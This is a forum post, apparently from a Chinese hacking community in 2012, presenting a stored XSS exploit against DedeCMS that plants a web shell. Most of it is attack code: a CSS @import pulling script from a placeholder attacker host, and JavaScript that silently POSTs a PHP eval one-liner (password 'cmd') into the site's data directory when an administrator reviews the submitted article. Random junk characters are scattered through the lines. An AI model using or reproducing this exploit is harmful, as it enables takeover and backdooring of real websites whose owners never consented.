找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1849|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
- u( y) m4 E; D4 w+ b为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
. E+ h8 I$ q9 q, e" h' _4 ^目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
0 f7 u3 c$ O! ]1 p0 }% N% Z( |下面说说利用方法。
% n+ Y7 h% {; ~1 o+ l/ Q" |条件有2个:
# W7 D; G3 l$ M  c2 _+ |1.开启注册3 M# |% o4 W% s# a, U: {. A
2.开启投稿
2 B* w& p3 a6 R: B, l" ]注册会员----发表文章
; Y# S" K6 @: C2 Z0 B内容填写:
& G6 I; O. l3 G7 @复制代码) J1 J+ ^3 A: o: F$ g
<style>@im\port'\http://xxx.com/xss.css';</style>2 W, n4 ]3 B+ s- O
新建XSS.Css
- v" W4 k. x& w( h复制代码
! Z/ @0 }3 f( I2 r9 P2 s! W5 d.body{5 O, L4 r+ B2 |. R7 h: ?9 m
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
! C; b! U; }2 B2 l) x. o新建xss.js 内容为- H& i8 P0 }; U, i7 v$ T1 C) U; b
复制代码
2 v. }! b: m+ t9 ?2 y  Z* p1.var request = false;+ J) V- R  _8 O: D4 d$ \& q; u1 L6 k
2.if(window.XMLHttpRequest) {  i& c9 b. r* s) }
3.request = new XMLHttpRequest();$ b# |& P9 G  k6 d# K$ f) B
4.if(request.overrideMimeType) {4 M8 r2 {* A  z9 D3 i/ ?3 X
5.request.overrideMimeType('text/xml');
+ g7 k6 f7 q/ a& {# v- L3 }- ~1 I6.}
0 [/ z! y3 c) d. U7.} else if(window.ActiveXObject) {
. ]! _% w9 N% @2 \0 P2 s8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];8 e; A* O" C+ Q+ A7 y
9.for(var i=0; i<versions.length; i++) {
* f# f: l; ]+ K10.try {! u2 o6 Z$ U* m# T2 p4 l
11.request = new ActiveXObject(versions);. Q% J1 x! Z0 t/ @7 _7 u4 v- I
12.} catch(e) {}
2 n( S1 ^& r# c  l* P+ J$ q13.}
$ ~- |; V3 i) c( T8 T% f14.}; p8 D) _1 K% g
15.xmlhttp=request;
) d1 s; o$ V, T! @0 S0 x4 \9 n, U16.function getFolder( url ){9 i- x# O: \/ X. o
17. obj = url.split('/')+ |  C7 n% }/ {0 {0 p
18. return obj[obj.length-2]
6 ?6 Y1 A5 x( a3 y) A% y19.}& u3 c5 c" F6 |8 z/ a" L
20.oUrl = top.location.href;
1 h8 {, V$ G4 m( U  R2 k21.u = getFolder(oUrl);
! u- @% H2 f- ~4 ]22.add_admin();
8 U: y. R9 H- G  u8 j% f( ?  D23.function add_admin(){
7 ~- q6 k! O! I- J( d2 I24.var url= "/"+u+"/sys_sql_query.php";  m6 x) Y( E. F0 s" G4 A
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";8 C, {) v3 E% u5 R
26.xmlhttp.open("POST", url, true);: m* t' q' r& [/ X2 K5 c( p
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");+ j& G- S" V" v
28.xmlhttp.setRequestHeader("Content-length", params.length);
9 j! a! ~$ p" H, ~3 L29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");5 {5 x% r# z; U% M# C- q
30.xmlhttp.send(params);
6 r( R+ I4 F: i. f: o3 ?31.}
" ]2 v+ B0 a6 t- B当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表